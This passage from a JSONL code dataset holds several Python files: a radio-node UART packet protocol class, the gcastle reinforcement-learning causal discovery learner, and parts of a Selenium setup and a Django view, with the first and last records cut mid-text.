pd.DataFrame(np.random.randn(0, max_len), columns=main_column)\n\tfor i in range(len(obj)):\n\t\tif len(obj[i]) Config:\n with open(CONFIG_FILE, 'r') as file:\n data = json.loads(file.read())\n return Config(**data)\n\n def __set_driver(self):\n if not self.is_test:\n self.driver = webdriver.Remote(\n command_executor='http://127.0.0.1:4444/wd/hub',\n desired_capabilities=DesiredCapabilities.CHROME)\n else:\n is_find = False\n for driver in self.config.drivers:\n try:\n self.driver = webdriver.Chrome(f'{self.config.base_path}/drivers/{driver}')\n is_find = True\n break\n except WebDriverException:\n continue\n\n assert is_find, 'Driver not found!'\n","sub_path":"core/BaseCore.py","file_name":"BaseCore.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"313007343","text":"import struct\nfrom classes import hardware\nfrom classes import common\n\nclass NRFCommands():\n\tdef __init__(self):\n\t\tself.OPCODE_RX_DATA\t\t\t= 100\n\t\tself.OPCODE_TX_DATA\t\t\t= 101\n\t\tself.OPCODE_SET_ADDRESS \t= 
102\n\t\tself.OPCODE_GET_ADDRESS \t= 103\n\t\tself.OPCODE_GET_NODEMAP \t= 104\n\t\tself.OPCODE_ADD_NODE_INDEX \t= 105\n\t\tself.OPCODE_DEL_NODE_INDEX \t= 106\n\t\tself.OPCODE_GET_NODE_INFO \t= 107\n\t\tself.OPCODE_GET_NODES_MAP \t= 108\n\t\tself.OPCODE_GET_NODES_LIST\t= 109\n\t\tself.OPCODE_SET_NODES_DATA\t= 110\n\t\tself.OPCODE_GET_NODES_DATA\t= 111\n\t\n\t'''\n\t{UART PACKET}\n\t-------------\n\t[MAGIC_NUMBER] \t\t(2 Bytes)\n\t[Direction] \t\t(1 Byte)\n\t[Opcode]\t\t\t(1 Byte)\n\t[Content Length] \t(1 Byte)\n\t[Payload]\t\t\t(57 Bytes)\n\t[MAGIC_NUMBER] \t\t(2 Bytes)\n\n\t{NRF PACKET}\n\t------------\n\t[NodeID] \t\t\t(1 Byte)\n\t[Opcode] \t\t\t(1 Byte)\n\t[Size] \t\t\t\t(1 Byte)\n\t[Payload]\t\t\t(12 Bytes)\n\t[CRC] \t\t\t\t(1 Byte)\n\t'''\n\n\tdef SetNodeDataCommand(self, index, data):\n\t\treturn struct.pack(\"BBBBBIBB\", 0xDE, 0xAD, 0x1, self.OPCODE_SET_NODES_DATA, index, data, 0xAD, 0xDE)\n\t\n\tdef GetNodeDataCommand(self, index):\n\t\treturn struct.pack(\"BBBBBBB\", 0xDE, 0xAD, 0x1, self.OPCODE_GET_NODES_DATA, index, 0xAD, 0xDE)\n\t\n\tdef GetNodeListCommand(self):\n\t\treturn struct.pack(\"BBBBBB\", 0xDE, 0xAD, 0x1, self.OPCODE_GET_NODES_LIST, 0xAD, 0xDE)\n\t\n\tdef ReadRemoteCommand(self, node_id, msg):\n\t\ts_msg = ''.join(chr(x) for x in msg)\n\t\t# \t\t\t\t\t\t\t\t\t\t\t\t\t [MN] [DIR] [OP] [LEN] [ID] [OP] [LEN] [P] [MN]\n\t\treturn struct.pack(\"BBBBBB{0}sBB\".format(len(msg)), 0xDE, 0xAD, 0x1, self.OPCODE_RX_DATA, 1, node_id, s_msg.encode(), 0xAD, 0xDE)\n\t\n\tdef WriteRemoteCommand(self, node_id):\n\t\treturn struct.pack(\"BBBBBBBB\", 0xDE, 0xAD, 0x1, self.OPCODE_TX_DATA, 1, node_id, 0xAD, 0xDE)\n\n\tdef GetNodeMapCommand(self):\n\t\treturn struct.pack(\"BBBBBB\", 0xDE, 0xAD, 0x1, self.OPCODE_GET_NODEMAP, 0xAD, 0xDE)\n\t\n\tdef AddNodeIndexCommand(self, index):\n\t\treturn struct.pack(\"BBBBBBBB\", 0xDE, 0xAD, 0x1, self.OPCODE_ADD_NODE_INDEX, 1, index, 0xAD, 0xDE)\n\t\n\tdef DelNodeIndexCommand(self, index):\n\t\treturn struct.pack(\"BBBBBBBB\", 
0xDE, 0xAD, 0x1, self.OPCODE_DEL_NODE_INDEX, 1, index, 0xAD, 0xDE)\n\n\tdef SetAddressCommand(self, address):\n\t\treturn struct.pack(\"BBBBBBBB\", 0xDE, 0xAD, 0x1, self.OPCODE_SET_ADDRESS, 1, address, 0xAD, 0xDE)\n\t\n\tdef GetAddressCommand(self):\n\t\treturn struct.pack(\"BBBBBB\", 0xDE, 0xAD, 0x1, self.OPCODE_GET_ADDRESS, 0xAD, 0xDE)\n\t\n\tdef GetNodeInfoCommand(self):\n\t\treturn struct.pack(\"BBBBBB\", 0xDE, 0xAD, 0x1, self.OPCODE_GET_NODE_INFO, 0xAD, 0xDE)\n\t\n\tdef GetNodesMapCommand(self):\n\t\treturn struct.pack(\"BBBBBB\", 0xDE, 0xAD, 0x1, self.OPCODE_GET_NODES_MAP, 0xAD, 0xDE)\n\nclass NRF(hardware.HardwareLayer):\n\tdef __init__(self):\n\t\thardware.HardwareLayer.__init__(self)\n\t\tself.Commands = NRFCommands()\n\n\t\tself.NodeTypeMap = {\n\t\t\t0x2: \"GATEWAY\",\n\t\t\t0x3: \"NODE\"\n\t\t}\n\t\n\tdef GetDeviceType(self, port):\n\t\tdev_type = self.HW.GetDeviceType(port)\n\t\treturn {\n\t\t\t'device_type': dev_type\n\t\t}\n\t\n\tdef GetDeviceAdditional(self, port):\n\t\tadditional = self.HW.GetDeviceAdditional(port)\n\t\tif (len(additional) > 1):\n\t\t\treturn {\n\t\t\t\t'type': self.NodeTypeMap[additional[0]],\n\t\t\t\t'index': additional[1]\n\t\t\t}\n\t\treturn None\n\t\n\tdef SetNodeAddress(self, port, address):\n\t\tpacket = self.Commands.SetAddressCommand(address)\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\n\t\tif len(packet) > 3:\n\t\t\tif packet[1] == self.Commands.OPCODE_SET_ADDRESS:\n\t\t\t\treturn {\n\t\t\t\t\t'index': packet[3]\n\t\t\t\t}\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef GetNodeAddress(self, port):\n\t\tpacket = self.Commands.GetAddressCommand()\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\t\t\n\t\tif len(packet) > 3:\n\t\t\tif packet[1] == self.Commands.OPCODE_GET_ADDRESS:\n\t\t\t\treturn 
{\n\t\t\t\t\t'index': packet[3]\n\t\t\t\t}\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef GetNodeInfo(self, port):\n\t\tpacket = self.Commands.GetNodeInfoCommand()\n\t\tinfo = self.HW.Send(port, packet)\n\n\t\tif info is None:\n\t\t\treturn None\n\t\t\n\t\tif len(info) > 3:\n\t\t\tif info[1] == self.Commands.OPCODE_GET_NODE_INFO:\n\t\t\t\treturn {\n\t\t\t\t\t'info': info\n\t\t\t\t}\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef GetNodeList(self, port):\n\t\tpacket = self.Commands.GetNodeListCommand()\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\t\t\n\t\tif len(packet) > 0:\n\t\t\tif packet[1] == self.Commands.OPCODE_GET_NODES_LIST:\n\t\t\t\tinfo = {\n\t\t\t\t\t'list': []\n\t\t\t\t}\n\t\t\t\tdata = packet[3:]\n\t\t\t\tfor idx, item in enumerate(data[::2]):\n\t\t\t\t\tnode = data[idx*2:idx*2+2]\n\t\t\t\t\tinfo[\"list\"].append({\n\t\t\t\t\t\t\"device_id\": node[0],\n\t\t\t\t\t\t\"status\": node[1]\n\t\t\t\t\t})\n\t\t\t\treturn info\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef GetNodesMap(self, port):\n\t\tpacket = self.Commands.GetNodesMapCommand()\n\t\tmap = self.HW.Send(port, packet)\n\n\t\tif map is None:\n\t\t\treturn None\n\t\t\n\t\tif len(map) > 3:\n\t\t\tif map[1] == self.Commands.OPCODE_GET_NODES_MAP:\n\t\t\t\treturn {\n\t\t\t\t\t'info': map\n\t\t\t\t}\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef AddNodeIndex(self, port, 
index):\n\t\tpacket = self.Commands.AddNodeIndexCommand(index)\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\n\t\tif len(packet) > 3:\n\t\t\tif packet[1] == self.Commands.OPCODE_ADD_NODE_INDEX:\n\t\t\t\tupdated_index = packet[3]\n\t\t\t\tstatus = False\n\t\t\t\tif index == updated_index:\n\t\t\t\t\tstatus = True\n\t\t\t\treturn {\n\t\t\t\t\t'status': status,\n\t\t\t\t\t'info': packet\n\t\t\t\t}\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef DelNodeIndex(self, port, index):\n\t\tpacket = self.Commands.DelNodeIndexCommand(index)\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\n\t\tif len(packet) > 3:\n\t\t\tif packet[1] == self.Commands.OPCODE_DEL_NODE_INDEX:\n\t\t\t\tupdated_index = packet[3]\n\t\t\t\tstatus = False\n\t\t\t\tif index == updated_index:\n\t\t\t\t\tstatus = True\n\t\t\t\treturn {\n\t\t\t\t\t'status': status,\n\t\t\t\t\t'device_id': updated_index\n\t\t\t\t}\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef GetRemoteNodeInfo(self, port, index):\n\t\tpayload = [self.Commands.OPCODE_GET_NODE_INFO, 0]\n\t\tpacket = self.Commands.ReadRemoteCommand(index, payload)\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\t\t\n\t\tif len(packet) > 0:\n\t\t\tif packet[1] == self.Commands.OPCODE_RX_DATA:\n\t\t\t\tif len(packet) > 18:\n\t\t\t\t\tif packet[4] == self.Commands.OPCODE_GET_NODE_INFO:\n\t\t\t\t\t\tnrf_packet = packet[3:]\n\t\t\t\t\t\treturn {\n\t\t\t\t\t\t\t'packet': nrf_packet\n\t\t\t\t\t\t}\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"(ERROR) Incorrect answer. 
{0}\".format(packet))\n\t\t\t\t\t\treturn None\n\t\t\t\telse:\n\t\t\t\t\tprint(\"(ERROR) Packet length incorrect.\")\n\t\t\t\t\treturn None\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef GetRemoteNodeData(self, port, node_id, sensor_index):\n\t\tpayload = [self.Commands.OPCODE_GET_NODES_DATA, 1, sensor_index]\n\t\tpacket = self.Commands.ReadRemoteCommand(node_id, payload)\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\t\t\n\t\tif len(packet) > 0:\n\t\t\tif packet[1] == self.Commands.OPCODE_RX_DATA:\n\t\t\t\tif packet[4] == self.Commands.OPCODE_GET_NODES_DATA:\n\t\t\t\t\tnrf_packet = packet[3:]\n\t\t\t\t\treturn {\n\t\t\t\t\t\t'packet': nrf_packet\n\t\t\t\t\t}\n\t\t\t\telse:\n\t\t\t\t\tprint(\"(ERROR) Incorrect answer. {0}\".format(packet))\n\t\t\t\t\treturn None\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef SetRemoteNodeData(self, port, node_id, sensor_index, sensor_value):\n\t\tarr_value = common.IntToBytes(sensor_value, 4)\n\t\t# arr_value = value.to_bytes(4, 'big')\n\t\tpayload = [self.Commands.OPCODE_SET_NODES_DATA, 5, sensor_index] + arr_value\n\t\tpacket = self.Commands.ReadRemoteCommand(node_id, payload)\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\n\t\tif packet is not None and len(packet) > 0:\n\t\t\tif packet[1] == self.Commands.OPCODE_RX_DATA:\n\t\t\t\tif packet[4] == self.Commands.OPCODE_SET_NODES_DATA:\n\t\t\t\t\tnrf_packet = packet[3:]\n\t\t\t\t\treturn {\n\t\t\t\t\t\t'packet': nrf_packet\n\t\t\t\t\t}\n\t\t\t\telse:\n\t\t\t\t\tprint(\"(ERROR) Incorrect answer. 
{0}\".format(packet))\n\t\t\t\t\treturn None\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef SetRemoteNodeAddress(self, port, node_id, address):\n\t\t# OPCODE : LEN : PAYLOAD\n\t\tpayload = [self.Commands.OPCODE_SET_ADDRESS, 1, address]\n\t\tpacket = self.Commands.ReadRemoteCommand(node_id, payload)\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\t\t\n\t\tif packet is not None and len(packet) > 0:\n\t\t\tif packet[1] == self.Commands.OPCODE_RX_DATA:\n\t\t\t\tif packet[4] == self.Commands.OPCODE_SET_ADDRESS:\n\t\t\t\t\treturn {\n\t\t\t\t\t\t'packet': packet\n\t\t\t\t\t}\n\t\t\t\telse:\n\t\t\t\t\tprint(\"(ERROR) Incorrect answer. {0}\".format(packet))\n\t\t\t\t\treturn None\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef GetRemoteNodeAddress(self, port, node_id):\n\t\tpayload = [self.Commands.OPCODE_GET_ADDRESS]\n\t\tpacket = self.Commands.ReadRemoteCommand(node_id, payload)\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\n\t\tif packet is not None and len(packet) > 0:\n\t\t\tif packet[1] == self.Commands.OPCODE_RX_DATA:\n\t\t\t\tif packet[4] == self.Commands.OPCODE_GET_ADDRESS:\n\t\t\t\t\treturn {\n\t\t\t\t\t\t'packet': packet\n\t\t\t\t\t}\n\t\t\t\telse:\n\t\t\t\t\tprint(\"(ERROR) Incorrect answer. 
{0}\".format(packet))\n\t\t\t\t\treturn None\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n","sub_path":"2020/poc/python/classes/nrf.py","file_name":"nrf.py","file_ext":"py","file_size_in_byte":10310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"630370655","text":"# coding=utf-8\n# Copyright (C) 2021. Huawei Technologies Co., Ltd. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport argparse\nimport platform\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\nfrom .data_loader import DataGenerator_read_data\nfrom .models import Actor\nfrom .rewards import get_Reward\nfrom .helpers.tf_utils import set_seed\nfrom .helpers.lambda_utils import BIC_lambdas\nfrom .helpers.analyze_utils import convert_graph_int_to_adj_mat, \\\n graph_prunned_by_coef, graph_prunned_by_coef_2nd\n\nfrom castle.common import BaseLearner, Tensor\nfrom castle.metrics import MetricsDAG\n\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')\n\n\nclass RL(BaseLearner):\n \"\"\"\n RL Algorithm.\n A classic causal discovery algorithm based on conditional independence tests.\n\n Parameters\n ----------\n encoder_type: str\n type of encoder used\n hidden_dim: int\n actor LSTM num_neurons\n num_heads: int\n actor 
input embedding\n num_stacks: int\n actor LSTM num_neurons\n residual: bool\n whether to use residual for gat encoder\n decoder_type: str\n type of decoder used\n decoder_activation: str\n activation for decoder\n decoder_hidden_dim: int\n hidden dimension for decoder\n use_bias: bool\n Whether to add bias term when calculating decoder logits\n use_bias_constant: bool\n Whether to add bias term as CONSTANT when calculating decoder logits\n bias_initial_value: float\n Initial value for bias term when calculating decoder logits\n batch_size: int\n batch size for training\n input_dimension: int\n dimension of reshaped vector\n normalize: bool\n whether the inputdata shall be normalized\n transpose: bool\n whether the true graph needs transposed\n score_type: str\n score functions\n reg_type: str\n regressor type (in combination wth score_type)\n lambda_iter_num: int\n how often to update lambdas\n lambda_flag_default: bool\n with set lambda parameters; true with default strategy and ignore input bounds\n score_bd_tight: bool\n if bound is tight, then simply use a fixed value, rather than the adaptive one\n lambda1_update: float\n increasing additive lambda1\n lambda2_update: float\n increasing multiplying lambda2\n score_lower: float\n lower bound on lambda1\n score_upper: float\n upper bound on lambda1\n lambda2_lower: float\n lower bound on lambda2\n lambda2_upper: float\n upper bound on lambda2\n seed: int\n seed\n nb_epoch: int\n nb epoch\n lr1_start: float\n actor learning rate\n lr1_decay_step: int\n lr1 decay step\n lr1_decay_rate: float\n lr1 decay rate\n alpha: float\n update factor moving average baseline\n init_baseline: float\n initial baseline - REINFORCE\n temperature: float\n pointer_net initial temperature\n C: float\n pointer_net tan clipping\n l1_graph_reg: float\n L1 graph regularization to encourage sparsity\n inference_mode: bool\n switch to inference mode when model is trained\n verbose: bool\n print detailed logging or not\n\n Attributes\n 
----------\n causal_matrix : numpy.ndarray\n Learned causal structure matrix\n\n References\n ----------\n https://arxiv.org/abs/1906.04477\n\n Examples\n --------\n >>> from castle.algorithms import RL\n >>> from castle.datasets import load_dataset\n >>> from castle.common import GraphDAG\n >>> from castle.metrics import MetricsDAG\n >>> true_dag, X = load_dataset(name='iid_test')\n >>> n = RL(lambda_flag_default=True)\n >>> n.learn(X, dag=true_dag)\n >>> GraphDAG(n.causal_matrix, true_dag)\n >>> met = MetricsDAG(n.causal_matrix, true_dag)\n >>> print(met.metrics)\n \"\"\"\n \n def __init__(self, encoder_type='TransformerEncoder', \n hidden_dim=64, \n num_heads=16, \n num_stacks=6, \n residual=False, \n decoder_type='SingleLayerDecoder', \n decoder_activation='tanh', \n decoder_hidden_dim=16, \n use_bias=False, \n use_bias_constant=False, \n bias_initial_value=False, \n batch_size=64, \n input_dimension=64, \n normalize=False, \n transpose=False, \n score_type='BIC', \n reg_type='LR', \n lambda_iter_num=1000, \n lambda_flag_default=False, \n score_bd_tight=False, \n lambda1_update=1.0, \n lambda2_update=10, \n score_lower=0.0, \n score_upper=0.0, \n lambda2_lower=-1.0, \n lambda2_upper=-1.0, \n seed=8, \n nb_epoch=20000, \n lr1_start=0.001,\n lr1_decay_step=5000, \n lr1_decay_rate=0.96, \n alpha=0.99, \n init_baseline=-1.0, \n temperature=3.0, \n C=10.0, \n l1_graph_reg=0.0, \n inference_mode=True, \n verbose=False):\n\n super().__init__()\n\n parser = argparse.ArgumentParser(description='Configuration')\n self.config = parser.parse_args(args=[])\n self.config.encoder_type = encoder_type\n self.config.hidden_dim = hidden_dim\n self.config.num_heads = num_heads\n self.config.num_stacks = num_stacks\n self.config.residual = residual\n self.config.decoder_type = decoder_type\n self.config.decoder_activation = decoder_activation\n self.config.decoder_hidden_dim = decoder_hidden_dim\n self.config.use_bias = use_bias\n self.config.use_bias_constant = use_bias_constant\n 
self.config.bias_initial_value = bias_initial_value\n self.config.batch_size = batch_size\n self.config.input_dimension = input_dimension\n self.config.normalize = normalize\n self.config.transpose = transpose\n self.config.score_type = score_type\n self.config.reg_type = reg_type\n self.config.lambda_iter_num = lambda_iter_num\n self.config.lambda_flag_default = lambda_flag_default\n self.config.score_bd_tight = score_bd_tight\n self.config.lambda1_update = lambda1_update\n self.config.lambda2_update = lambda2_update\n self.config.score_lower = score_lower\n self.config.score_upper = score_upper\n self.config.lambda2_lower = lambda2_lower\n self.config.lambda2_upper = lambda2_upper\n self.config.seed = seed\n self.config.nb_epoch = nb_epoch\n self.config.lr1_start = lr1_start\n self.config.lr1_decay_step = lr1_decay_step\n self.config.lr1_decay_rate = lr1_decay_rate\n self.config.alpha = alpha\n self.config.init_baseline = init_baseline\n self.config.temperature = temperature\n self.config.C = C\n self.config.l1_graph_reg = l1_graph_reg\n self.config.inference_mode = inference_mode\n self.config.verbose = verbose\n\n def learn(self, data, dag=None):\n \"\"\"\n Set up and run the RL algorithm.\n\n Parameters\n ----------\n data: castle.Tensor or numpy.ndarray\n The castle.Tensor or numpy.ndarray format data you want to learn.\n \"\"\"\n config = self.config\n if dag is not None:\n config.dag = dag\n\n if isinstance(data, np.ndarray):\n X = data\n elif isinstance(data, Tensor):\n X = data.data\n else:\n raise TypeError('The type of data must be '\n 'Tensor or numpy.ndarray, but got {}'\n .format(type(data)))\n \n config.data_size = X.shape[0]\n config.max_length = X.shape[1]\n\n causal_matrix = self._rl(X, config)\n self.causal_matrix = causal_matrix\n\n def _rl(self, X, config):\n # Reproducibility\n set_seed(config.seed)\n\n logging.info('Python version is {}'.format(platform.python_version()))\n\n # input data\n if hasattr(config, 'dag'):\n training_set = 
DataGenerator_read_data(\n X, config.dag, config.normalize, config.transpose)\n else:\n training_set = DataGenerator_read_data(\n X, None, config.normalize, config.transpose)\n\n # set penalty weights\n score_type = config.score_type\n reg_type = config.reg_type\n\n if config.lambda_flag_default: \n sl, su, strue = BIC_lambdas(training_set.inputdata, None, None, None, reg_type, score_type)\n lambda1 = 0\n lambda1_upper = 5\n lambda1_update_add = 1\n lambda2 = 1/(10**(np.round(config.max_length/3)))\n lambda2_upper = 0.01\n lambda2_update_mul = 10\n lambda_iter_num = config.lambda_iter_num\n\n # test initialized score\n logging.info('Original sl: {}, su: {}, strue: {}'.format(sl, su, strue))\n logging.info('Transfomed sl: {}, su: {}, lambda2: {}, true: {}'.format(sl, su, lambda2,\n (strue-sl)/(su-sl)*lambda1_upper)) \n else:\n # test choices for the case with mannualy provided bounds\n # not fully tested\n sl = config.score_lower\n su = config.score_upper\n if config.score_bd_tight:\n lambda1 = 2\n lambda1_upper = 2\n else:\n lambda1 = 0\n lambda1_upper = 5\n lambda1_update_add = 1\n lambda2 = 1/(10**(np.round(config.max_length/3)))\n lambda2_upper = 0.01\n lambda2_update_mul = config.lambda2_update\n lambda_iter_num = config.lambda_iter_num\n\n # actor\n actor = Actor(config)\n callreward = get_Reward(actor.batch_size, config.max_length, \n actor.input_dimension, training_set.inputdata,\n sl, su, lambda1_upper, score_type, reg_type, \n config.l1_graph_reg, False)\n logging.info('Finished creating training dataset, actor model and reward class')\n\n logging.info('Starting session...')\n sess_config = tf.ConfigProto(log_device_placement=False)\n sess_config.gpu_options.allow_growth = True\n\n with tf.Session(config=sess_config) as sess:\n # Run initialize op\n sess.run(tf.global_variables_initializer())\n\n # Test tensor shape\n logging.info('Shape of actor.input: {}'.format(sess.run(tf.shape(actor.input_))))\n\n # Initialize useful variables\n rewards_avg_baseline = 
[]\n rewards_batches = []\n reward_max_per_batch = []\n \n lambda1s = []\n lambda2s = []\n \n graphss = []\n probsss = []\n max_rewards = []\n max_reward = float('-inf')\n max_reward_score_cyc = (lambda1_upper+1, 0)\n\n logging.info('Starting training.')\n \n for i in (range(1, config.nb_epoch + 1)):\n\n if config.verbose:\n logging.info('Start training for {}-th epoch'.format(i))\n\n input_batch = training_set.train_batch(actor.batch_size, actor.max_length, actor.input_dimension)\n graphs_feed = sess.run(actor.graphs, feed_dict={actor.input_: input_batch})\n reward_feed = callreward.cal_rewards(graphs_feed, lambda1, lambda2)\n\n # max reward, max reward per batch\n max_reward = -callreward.update_scores([max_reward_score_cyc], lambda1, lambda2)[0]\n max_reward_batch = float('inf')\n max_reward_batch_score_cyc = (0, 0)\n\n for reward_, score_, cyc_ in reward_feed:\n if reward_ < max_reward_batch:\n max_reward_batch = reward_\n max_reward_batch_score_cyc = (score_, cyc_)\n \n max_reward_batch = -max_reward_batch\n\n if max_reward < max_reward_batch:\n max_reward = max_reward_batch\n max_reward_score_cyc = max_reward_batch_score_cyc\n\n # for average reward per batch\n reward_batch_score_cyc = np.mean(reward_feed[:,1:], axis=0)\n\n if config.verbose:\n logging.info('Finish calculating reward for current batch of graph')\n\n # Get feed dict\n feed = {actor.input_: input_batch, actor.reward_: -reward_feed[:,0], actor.graphs_:graphs_feed}\n\n summary, base_op, score_test, probs, graph_batch, reward_batch, \\\n reward_avg_baseline, train_step1, train_step2 = sess.run( \\\n [actor.merged, actor.base_op, actor.test_scores, \\\n actor.log_softmax, actor.graph_batch, actor.reward_batch, \\\n actor.avg_baseline, actor.train_step1, actor.train_step2], \\\n feed_dict=feed)\n\n if config.verbose:\n logging.info('Finish updating actor and critic network using reward calculated')\n \n lambda1s.append(lambda1)\n lambda2s.append(lambda2)\n\n 
rewards_avg_baseline.append(reward_avg_baseline)\n rewards_batches.append(reward_batch_score_cyc)\n reward_max_per_batch.append(max_reward_batch_score_cyc)\n\n graphss.append(graph_batch)\n probsss.append(probs)\n max_rewards.append(max_reward_score_cyc)\n\n # logging\n if i == 1 or i % 500 == 0:\n logging.info('[iter {}] reward_batch: {:.4}, max_reward: {:.4}, max_reward_batch: {:.4}'.format(i,\n reward_batch, max_reward, max_reward_batch))\n\n # update lambda1, lamda2\n if i == 1 or i % lambda_iter_num == 0:\n ls_kv = callreward.update_all_scores(lambda1, lambda2)\n\n graph_int, score_min, cyc_min = np.int32(ls_kv[0][0]), ls_kv[0][1][1], ls_kv[0][1][-1]\n\n if cyc_min < 1e-5:\n lambda1_upper = score_min\n lambda1 = min(lambda1+lambda1_update_add, lambda1_upper)\n lambda2 = min(lambda2*lambda2_update_mul, lambda2_upper)\n logging.info('[iter {}] lambda1 {:.4}, upper {:.4}, lambda2 {:.4}, upper {:.4}, score_min {:.4}, cyc_min {:.4}'.format(i,\n lambda1*1.0, lambda1_upper*1.0, lambda2*1.0, lambda2_upper*1.0, score_min*1.0, cyc_min*1.0))\n\n graph_batch = convert_graph_int_to_adj_mat(graph_int)\n\n if reg_type == 'LR':\n graph_batch_pruned = np.array(graph_prunned_by_coef(graph_batch, training_set.inputdata))\n elif reg_type == 'QR':\n graph_batch_pruned = np.array(graph_prunned_by_coef_2nd(graph_batch, training_set.inputdata))\n\n if hasattr(config, 'dag'):\n met = MetricsDAG(graph_batch.T, training_set.true_graph)\n met2 = MetricsDAG(graph_batch_pruned.T, training_set.true_graph)\n acc_est = met.metrics\n acc_est2 = met2.metrics\n\n fdr, tpr, fpr, shd, nnz = \\\n acc_est['fdr'], acc_est['tpr'], acc_est['fpr'], \\\n acc_est['shd'], acc_est['nnz']\n fdr2, tpr2, fpr2, shd2, nnz2 = \\\n acc_est2['fdr'], acc_est2['tpr'], acc_est2['fpr'], \\\n acc_est2['shd'], acc_est2['nnz']\n \n logging.info('before pruning: fdr {}, tpr {}, fpr {}, shd {}, nnz {}'.format(fdr, tpr, fpr, shd, nnz))\n logging.info('after pruning: fdr {}, tpr {}, fpr {}, shd {}, nnz {}'.format(fdr2, tpr2, 
fpr2, shd2, nnz2))\n\n plt.figure(1)\n plt.plot(rewards_batches, label='reward per batch')\n plt.plot(max_rewards, label='max reward')\n plt.legend()\n plt.savefig('reward_batch_average.png')\n plt.close()\n \n logging.info('Training COMPLETED !')\n\n return graph_batch_pruned.T\n","sub_path":"gcastle/castle/algorithms/gradient/rl/rl.py","file_name":"rl.py","file_ext":"py","file_size_in_byte":17224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"514172145","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\n\nfrom .models import UserMessage\nimport re\n# Create your views here.\n\ndef getform(request):\n # return render(request,'message_form.html')\n\n #UserMessage默认的数据管理器是objects\n #方法all()将所有数据返回成一个queryset类型\n\n full_path = request.get_full_path()\n r = re.search('\\?(\\w)=(\\d{4})&(\\w)=(\\d{4})&(\\w{2})=(\\d)&(\\w)=(\\d)&(\\w{2})=(\\d{7})',full_path).groups()\n sn = ''\n for i in r:\n sn += i\n sn = sn.upper()\n # print(sn)\n message = UserMessage.objects.get(serial_num=sn)\n return render(request,'message_form.html',{'my_message': 